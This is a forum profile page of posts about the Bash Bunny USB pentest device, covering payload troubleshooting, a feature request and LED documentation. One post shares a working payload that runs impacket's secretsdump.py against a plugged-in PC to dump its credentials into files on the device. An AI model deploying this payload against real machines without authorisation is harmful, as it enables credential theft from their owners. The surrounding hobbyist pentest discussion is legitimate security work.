Altecheon
-
Posts
6 -
Joined
-
Last visited
Posts posted by Altecheon
-
-
1 minute ago, mrpmcfc said:
I can ping the machine from the bunny but if I run your script the TestOutput is empty
If the script returns blank, make sure that the GET function is in the extension folder of the library folder.
If it isn't there, then make sure to put the newest repository on the bunny. It should have the extension
-
can you guys successfully connect to the BB through ssh with the ip 172.16.64.1? If so see if you can ping the IP given to the machine, usually mine is 172.16.64.10. It should show via ifconfig or ipconfig in the respective operating systems if the system is receiving an IP. An example payload of these in action is as follows.
Quote# System default payload
LED R SLOW
ATTACKMODE RNDIS_ETHERNET
GET TARGET_HOSTNAME
GET TARGET_IP
cd /
if [ ! -d "temp" ]; then
mkdir temp
fi
echo $TARGET_IP $TARGET_HOSTNAME > /temp/TestOutputThis should create a file at /temp/ named TestOutput. To access it log into the bunny and look for it
Quotecat /temp/TestOutput
I don't have my bunny at the moment to test the code, but you should be able to see what the payloads see. If you cannot access the bunny, make sure that your computer can correctly see the bunny (ex drivers found)
-
It is a custom payload using impacket at the old firmware location. It assumes that you know the domain/user and password to pull credentials from a PC. If the account is cached, it executes, but if not it fails due to contacting the login server. I have also figured out that the use of an @ or a colon in a password causes issues for the impacket code.
QuoteUSER=domain/Genericuser
PASS=GenericPasswordLED R SLOW
ATTACKMODE RNDIS_ETHERNET
GET TARGET_HOSTNAME
GET TARGET_IP#if target does not get an IP give fail LED
if [ -z "${TARGET_IP}" ]; then
LED R 100
exit 1
fi
cd /pentest/impacket/examplesif [ ! -d "temp" ]; then
mkdir temp
fipython secretsdump.py $USER:$PASS@$TARGET_IP -outputfile temp/$TARGET_HOSTNAME > temp/$temp/$TARGET_HOSTNAME.outputfile
sync
LED G SLOW -
I understand that part of the plan for the BB was Man in the Middle attacks, which is why I am running into an issue with one of the payloads I am playing around with. In an enterprise environment the system, unless its a laptop, may not cache credentials that you may have obtained. This being said if the user is not currently logged into the machine or has not logged in for a while, the system will attempt to reach out to a log in server. If the BB is the route the system takes to reach the internet, then the computer will throw an error like this
Quote"SMB SessionError: STATUS_NO_LOGON_SERVERS(No logon servers are currently available to service the logon request.)"
All of that being said, i think a feature that may be helpful would be to allow for configuration of the Ethernet modes. This would allow you to set the connection to slower than most networks or maybe having no connection to the internet. This would also help when you do not wish to interrupt internet connectivity for the device.
I cannot say that you cannot configure this already, but I can say I do not know how to configure this and that I am curious as to how I would do this.
LED Control
in Bash Bunny
Posted
Please refer to this document. It includes details on how to use the LED features
https://wiki.bashbunny.com/#!payload_development.md